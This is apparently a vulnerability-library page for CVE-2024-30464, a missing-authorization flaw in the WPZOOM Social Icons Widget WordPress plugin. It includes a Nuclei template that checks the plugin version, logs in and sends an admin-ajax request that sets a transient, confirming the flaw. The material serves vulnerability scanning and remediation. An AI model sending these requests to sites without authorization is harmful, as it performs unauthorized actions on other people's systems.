/Vulnerability Library

WPZOOM Social Icons Widget <= 4.2.15 - Missing Authorization

CVE-2024-30464
Verified

Description

WPZOOM Social Icons Widget & Block versions up to 4.2.15 contain a missing authorization vulnerability caused by insufficient access control in the widget and block, letting attackers perform unauthorized actions, exploit requires no special conditions.

Severity

Medium

CVSS Score

4.3

Exploit Probability

42%

Affected Product

social-icons-widget-by-wpzoom

Published Date

March 13, 2026

Template Author

pussycat0x

CVE-2024-30464.yaml
id: CVE-2024-30464

info:
  name: WPZOOM Social Icons Widget <= 4.2.15 - Missing Authorization
  author: pussycat0x
  severity: medium
  description: |
    WPZOOM Social Icons Widget & Block versions up to 4.2.15 contain a missing authorization vulnerability caused by insufficient access control in the widget and block, letting attackers perform unauthorized actions, exploit requires no special conditions.
  impact: |
    Attackers can perform unauthorized actions, potentially leading to data tampering or privilege escalation.
  remediation: |
    Update to version 4.2.16 or later.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/social-icons-widget-by-wpzoom/social-icons-widget-block-by-wpzoom-4215-missing-authorization
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 4.3
    cve-id: CVE-2024-30464
    epss-score: 0.41698
    epss-percentile: 0.9747
    cwe-id: CWE-862
  metadata:
    verified: true
    max-request: 4
    vendor: wpzoom
    product: social-icons-widget-by-wpzoom
    framework: wordpress
    publicwww-query: "/plugins/social-icons-widget-by-wpzoom/"
  tags: cve,cve2024,wordpress,wp,wp-plugin,wpzoom,authenticated

variables:
  rand: "{{rand_int(10000, 99999)}}"

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/social-icons-widget-by-wpzoom/readme.txt"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "compare_versions(version, '<= 4.2.15')"
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        group: 1
        name: version
        regex:
          - 'Stable tag: ([0-9.]+)'
        internal: true

  - raw:
      - |
        GET /wp-login.php HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=/wp-admin/&testcookie=1

      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        X-Requested-With: XMLHttpRequest

        action=zoom_ajax_set_pointer_transient&transient_name={{rand}}&lifetime=3600

    redirects: true
    max-redirects: 3

    matchers:
      - type: dsl
        dsl:
          - 'status_code_3 == 200'
          - 'contains(body,"Done, transient is set") && contains(body,"success\":true")'
        condition: and
# digest: 490a0046304402204b1f184b4612bb45748d67e352d007f03d59c4668cdb1a2448e069a55879a9fe0220011c7f7dba4c77c6c575a3159517aa9cd7dd2e04b94c9832bb276872211c261d:922c64590222798bb761d5b6d8e72950
4.3Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
CVE ID:
cve-2024-30464
CWE ID:
cwe-862

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/social-icons-widget-by-wpzoom/social-icons-widget-block-by-wpzoom-4215-missing-authorization

Remediation Steps

Update to version 4.2.16 or later.